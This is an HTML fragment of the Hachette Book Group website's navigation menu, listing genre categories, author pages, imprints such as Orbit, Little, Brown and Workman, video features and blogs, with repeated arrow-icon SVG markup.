Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1391394804" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1391394804" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1391394804" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1006196067  desc-arrow-1870600541">
	<title id="titlet-arrow-1006196067">Arrow Icon</title>
	<desc id="desc-arrow-1870600541">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1391394804" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1391394804"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-628975402" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-628975402" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-628975402" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2212786108  desc-arrow-3655433626">
	<title id="titlet-arrow-2212786108">Arrow Icon</title>
	<desc id="desc-arrow-3655433626">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-628975402" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-628975402"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-1892287715" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1892287715" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1892287715" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-165277928  desc-arrow-2090287334">
	<title id="titlet-arrow-165277928">Arrow Icon</title>
	<desc id="desc-arrow-2090287334">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1892287715" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1892287715"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve Books">Twelve Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-123813037" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-123813037" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-123813037" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1125786464  desc-arrow-596109512">
	<title id="titlet-arrow-1125786464">Arrow Icon</title>
	<desc id="desc-arrow-596109512">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-123813037" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-123813037"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-549097698" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-549097698" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-549097698" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2320612112  desc-arrow-2773571250">
	<title id="titlet-arrow-2320612112">Arrow Icon</title>
	<desc id="desc-arrow-2773571250">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-549097698" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-549097698"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1408560888" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1408560888" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1408560888" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3853811173  desc-arrow-3430527566">
	<title id="titlet-arrow-3853811173">Arrow Icon</title>
	<desc id="desc-arrow-3430527566">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1408560888" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1408560888"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-2140784440" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-2140784440" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-2140784440" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1590426430  desc-arrow-3603021582">
	<title id="titlet-arrow-1590426430">Arrow Icon</title>
	<desc id="desc-arrow-3603021582">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-2140784440" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-2140784440"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Publishing">Workman Publishing</a><span id="expand-site-header__sub-menu-855572801" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-855572801" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-855572801" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2618610232  desc-arrow-949005876">
	<title id="titlet-arrow-2618610232">Arrow Icon</title>
	<desc id="desc-arrow-949005876">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-855572801" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-855572801"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman">Workman</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.pageaday.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Calendars">Workman Calendars</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/kids" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Workman Kids">Workman Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Books of Chapel Hill">Algonquin Books of Chapel Hill</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/algonquin-young-readers" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Algonquin Young Readers">Algonquin Young Readers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.workman.com/imprints/artisan" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Artisan">Artisan</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.timberpress.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Timber Press">Timber Press</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.storey.com" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Storey Publishing">Storey Publishing</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-1224502404" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1224502404" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1224502404" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-343916101  desc-arrow-2658382670">
	<title id="titlet-arrow-343916101">Arrow Icon</title>
	<desc id="desc-arrow-2658382670">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1224502404" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1224502404"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-910506617" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-910506617" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-910506617" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1330759732  desc-arrow-136277763">
	<title id="titlet-arrow-1330759732">Arrow Icon</title>
	<desc id="desc-arrow-136277763">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-910506617" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-910506617"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/moon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Moon Travel">Moon Travel</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/rick-steves/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Rick Steves">Rick Steves</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1183803401" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1183803401" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1183803401" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2796940610  desc-arrow-3398533258">
	<title id="titlet-arrow-2796940610">Arrow Icon</title>
	<desc id="desc-arrow-3398533258">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1183803401" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1183803401"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/basic-books/seal-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Seal Press">Seal Press</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-1935431881" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1935431881" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1935431881" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2213935486  desc-arrow-2922945409">
	<title id="titlet-arrow-2213935486">Arrow Icon</title>
	<desc id="desc-arrow-2922945409">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1935431881" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1935431881"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/hachette-go/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Go">Hachette Go</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-642687397" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-642687397" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-642687397" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-263899076  desc-arrow-3473509919">
	<title id="titlet-arrow-263899076">Arrow Icon</title>
	<desc id="desc-arrow-3473509919">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-642687397" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-642687397"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/bold-type-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Type Books">Bold Type Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/the-economist/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Economist Books">Economist Books</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-526077654" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-526077654" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-526077654" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3039460710  desc-arrow-127748593">
	<title id="titlet-arrow-3039460710">Arrow Icon</title>
	<desc id="desc-arrow-127748593">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-526077654" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-526077654"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/black-dog-leventhal/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Black Dog &amp; Leventhal">Black Dog &amp; Leventhal</a></span></li>		</ul>
</li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-1049111607" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1049111607" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1049111607" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1993056004  desc-arrow-176876680">
	<title id="titlet-arrow-1993056004">Arrow Icon</title>
	<desc id="desc-arrow-176876680">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1049111607" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1049111607"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-1184663" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1184663" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1184663" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3227154422  desc-arrow-1137375586">
	<title id="titlet-arrow-3227154422">Arrow Icon</title>
	<desc id="desc-arrow-1137375586">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1184663" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1184663"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li></ul>
